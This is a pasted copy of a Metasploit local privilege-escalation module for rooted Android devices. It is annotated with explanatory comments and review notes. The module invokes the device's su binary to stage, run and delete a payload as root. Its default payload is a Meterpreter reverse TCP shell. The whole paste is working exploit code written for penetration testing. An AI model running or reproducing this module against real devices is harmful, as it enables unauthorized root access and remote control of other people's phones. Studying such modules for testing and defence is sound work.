
su_exec.rb

a guest Jul 18th, 2019 65 Never
  ##
  # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##

  # Local (post-session) module: from an existing session on a rooted Android
  # device it asks the device's own su binary to run a staged payload as root.
  #
  # Nothing here bypasses a control. The only gate is the su binary's approval
  # policy, and the module description states that most devices show an
  # on-device prompt. The artefacts visible to a defender are a `su -c`
  # invocation issued from the session and a short-lived executable under
  # WritableDir (default /data/local/tmp/).
  class MetasploitModule < Msf::Exploit::Local
    # Ranked manual; per the description, the outcome usually hinges on someone
    # approving the su prompt on the device.
    Rank = ManualRanking

    include Msf::Exploit::CmdStager
    include Msf::Post::File
    include Msf::Post::Android::Priv

    # Registers the module metadata, one target per supported architecture, and
    # the two user-settable options (SU_BINARY and WritableDir).
    #
    # @param info [Hash] metadata overrides merged in through update_info
    def initialize(info = {})
      # Description text, kept verbatim including its leading whitespace.
      summary = %q{
          This module uses the su binary present on rooted devices to run
          a payload as root.
          A rooted Android device will contain a su binary (often linked with
          an application) that allows the user to run commands as root.
          This module will use the su binary to execute a command stager
          as root. The command stager will write a payload binary to a
          temporary directory, make it executable, execute it in the background,
          and finally delete the executable.
          On most devices the su binary will pop-up a prompt on the device
          asking the user for permission.
      }

      # Target label => architecture constant; insertion order is the target
      # order, so index 0 (aarch64) is the default target.
      arch_by_target = {
        'aarch64' => ARCH_AARCH64,
        'armle' => ARCH_ARMLE,
        'x86' => ARCH_X86,
        'x64' => ARCH_X64,
        'mipsle' => ARCH_MIPSLE
      }
      target_list = arch_by_target.map { |label, arch| [label, { 'Arch' => arch }] }

      details = {
        'Name' => "Android 'su' Privilege Escalation",
        'Description' => summary,
        'Author' => 'timwr',
        'License' => MSF_LICENSE,
        'DisclosureDate' => 'Aug 31 2017',
        'SessionTypes' => ['meterpreter', 'shell'],
        'Platform' => ['android', 'linux'],
        'Arch' => arch_by_target.values,
        'Targets' => target_list,
        'DefaultOptions' => {
          'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
          'WfsDelay' => 5
        },
        'DefaultTarget' => 0
      }
      super(update_info(info, details))

      su_option = OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su'])
      dir_option = OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
      register_options([su_option, dir_option])
    end

    # @return [String] the WritableDir option, where the stager drops its file
    def base_dir
      writable_dir = datastore['WritableDir']
      writable_dir.to_s
    end

    # @return [String] the SU_BINARY option: name or path of the su binary
    def su_bin
      configured_su = datastore['SU_BINARY']
      configured_su.to_s
    end

    # Refuses to run when the session is already root, otherwise hands the
    # payload to the echo/octal command stager with base_dir as its temp dir.
    def exploit
      fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?

      stager_opts = {
        flavor: :echo,
        enc_format: :octal,
        prefix: '\\\\0',
        temp: base_dir,
        # NOTE(review): 4088 looks like headroom under a 4096-byte command
        # limit, reduced by the length of the su binary name -- confirm.
        linemax: 4088 - su_bin.size,
        background: true
      }
      execute_cmdstager(stager_opts)
    end

    # Wraps one command in `<su_bin> -c '...'` and runs it in the session.
    # Presumably invoked by the CmdStager mixin for each staged line -- confirm.
    #
    # NOTE(review): cmd is interpolated between single quotes with no escaping,
    # so a command that itself contains a single quote would end the quoting early.
    #
    # @param cmd [String] command line to run through su
    # @param opts [Hash] unused here
    def execute_command(cmd, opts)
      cmd_exec("#{su_bin} -c '#{cmd}'")
    end
  end